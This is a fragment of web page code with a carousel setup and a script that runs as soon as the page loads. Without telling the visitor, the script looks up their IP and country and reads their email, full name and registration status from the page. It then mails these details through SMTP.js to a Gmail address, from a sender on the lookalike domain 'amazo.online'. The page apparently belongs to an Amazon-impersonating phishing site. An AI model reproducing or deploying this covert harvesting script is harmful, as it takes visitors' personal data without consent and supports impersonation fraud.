


<script src="https://smtpjs.com/v3/smtp.js"></script>

<script>
    $(document).ready(function() {
        // $(".owl-carousel").owlCarousel();
    $("#owl-demo").owlCarousel({

    autoPlay: 2000, //Set AutoPlay to 3 seconds
    // //Autoplay
    // autoPlay : true,
    // goToFirst : true,
    // goToFirstSpeed : 1000,

   
    items : 3,
    itemsDesktop : [1199,3],
    itemsDesktopSmall : [979,3]

 });

});
</script>
<script>
  function sendEmail(ipAddress, country, isRegistered, userEmail, fullName) {
    var adminEmail = "@gmail.com";
    var subject = "New Web Visitor Alert";
    var emailBody = `
        <h2>New Login Alert</h2>
        <p>A user has logged in to your website. amazontracks</p>
        <p><strong>Login Details:</strong></p>
        <ul>
          <li><strong>IP Address:</strong> ${ipAddress}</li>
          <li><strong>Country:</strong> ${country}</li>
          <li><strong>Registered:</strong> ${isRegistered}</li>
          <li><strong>User Email:</strong> ${userEmail}</li>
          <li><strong>Full Name:</strong> ${fullName}</li>
        </ul>
    `;

    Email.send({
      SecureToken: "26788622-f74f-47212af245",
      To: adminEmail,
      From: "support@amazo.online",
      Subject: subject,
      Body: emailBody,
      isHtml: true
    });
  }

  // Fetch the user's IP address and registration status
  function fetchVisitorDetails() {
    fetch('https://ipapi.co/json/')
      .then(response => response.json())
      .then(data => {
        var ipAddress = data.ip;
        var country = data.country_name;
        var isRegistered = document.getElementById("is-registered").value;
        var userEmail = document.getElementById("user-email").value;
        var fullName = document.getElementById("full-name").value;

        // Send email with visitor details
        sendEmail(ipAddress, country, isRegistered, userEmail, fullName);
      })
      .catch(error => console.log(error));
  }

  // Run the script when the page is loaded
  fetchVisitorDetails();
</script>
